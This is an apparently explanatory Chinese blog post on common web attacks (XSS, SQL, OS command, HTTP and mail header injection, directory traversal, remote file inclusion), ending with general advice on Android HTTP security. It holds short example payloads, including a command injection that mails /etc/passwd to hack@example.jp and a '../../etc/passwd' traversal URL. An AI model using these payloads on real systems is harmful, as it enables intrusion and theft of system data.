HTTP 攻击

一、XSS攻击,通过script 代码进行攻击。

危害:可以实现对网站的非法访问提示弹框或者引导用户把提交信息指定非法网站,记录后。再返回原网站。

事例:http://localhost/index.php?q="<script>alert('你被攻击了')</script>"

二、SQL攻击,通过可以执行SQL的获取参数,进行特殊处理。

危害:可以实现对数据库的相关数据获取。

事例:select *  from test   where name='aa' --- " and del=1";

可以实现该有的查询and del=1 被注释,结果返回所有name=aa的数据

三、OS攻击,指针对程序操作sheel脚本处理加以特殊处理。

危害:获取相关信息,最经典事例,发达邮件。

my $adr = $q->param('mailaddress');

open(MALL, "| /user/sbin.sendmail $adr");

print MAIL "From: info@example.com\n";

可以把指定邮件修改成还有分号的邮件地址,例如:;cat /etc/passwd | mail hack@example.jp

程序会变成:/usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp

程序会把linux下所有的用户名以邮件形式发送给 hack@example.jp。

四、HTTP首部注入攻击

属于被动攻击模式,只有向首部主体添加的内容时才有可能实现功击。

事例:

localtion:http://localhost/a.php?q=12345

set-cookie:uid=12345

通过修改某字段需要输出的值进行攻击。

危害:设置任何cookie 信息

           重定向至任意URL

            显示任意的主体(http响应截断攻击)

注:http响应截断攻击是用在HTTP部注入的一种攻击,攻击顺序相同,但是要将两个%0D%0A%0D%0A并排插入字符串后发达,利用这两个连续的换行就可以作出HTTP首部与主体分隔的空行 ,这样显示伪造的主体,达到攻击的目的,再让用户输入信息,可达到和跨站脚本攻击相同的效果。

五、邮件首部注入攻击

邮件首部注入是指web应用中的邮件发送攻能,攻击者通过向邮件首部to或者subject内任意添加非法内容发起的攻击,利用存在安全漏洞的web网站,可以任意邮件发送广告或者病毒邮件。

事例:

bob@example.com%0D%0ADcc; user@example.com

%0D%0ADcc为换行,一旦表格接收了这个换行符,就可以实现对另一个邮件的追发,原本是无法指定的。

六、目录遍历攻击

是指本无意公开的目录,通过非法截断后,达成访问目的一种攻击。

事例:

http://localhost/a.php?log=../../etc/passwd

七、运程文件包含漏洞

指当前脚本需要从其他文件读取内容时,利用外部服务器的url充当依赖文件,让脚本读取之后,可以任意运行脚要的一种攻击。

主要针对php中include或者require来说,5.2之后默认此功能无效。

http://localhost/a.php?mod =http://www.baidu.com/cmd.php&cmd=ls

八、程序设计缺陷引发的的安全一漏洞

九、不正确的错误消息处理。

十、会话劫持

十一、点击劫持

十二 、dos攻击

让服务器呈现一种停止状态,主要利用资源过载,实现停止 。

利用安全漏洞让服务器停止。

十三、后门程序

例如开过过程中调试程序的debug处理。

 

 

 

 

Android HTTP攻击是指针对Android操作系统上的HTTP通信进行攻击的行为。Android是目前最流行的移动操作系统之一,其应用程序通常使用HTTP协议与服务器进行通信。攻击者可以利用漏洞或弱点来干扰、伪装或控制这些通信过程。 一种常见的Android HTTP攻击是中间人攻击攻击者可以在用户和服务器之间插入自己的设备或恶意软件,并监视和修改通信内容。这可能会导致用户信息被窃取或篡改。 另一种常见的攻击是拒绝服务(DoS)或分布式拒绝服务(DDoS)攻击攻击者发送大量请求来占用服务器资源,使正常用户无法访问服务。这种攻击可以通过合理的流量监测和防护措施来缓解。 此外,攻击者还可以利用网络嗅探工具来截取传输的敏感数据,如用户名、密码等,从而进行身份欺骗或其他恶意行为。 为了防范Android HTTP攻击,开发者和用户可以采取以下措施: 1. 使用HTTPS协议来加密HTTP通信,确保通信内容的安全性和完整性。 2. 应用程序开发者要进行安全编码,避免在传输敏感数据时使用明文传输。 3. 定期更新操作系统和应用程序,以修复已知的安全漏洞,并保持软件的最新版本。 4. 使用可靠的安全软件,如防火墙和反病毒软件,来阻止恶意软件的入侵。 5. 用户要谨慎下载和安装来自不可信来源的应用程序,以防止恶意软件的安装。 总之,Android HTTP攻击是一种威胁用户隐私和数据安全的行为,需要开发者和用户共同努力来保护移动设备和通信安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值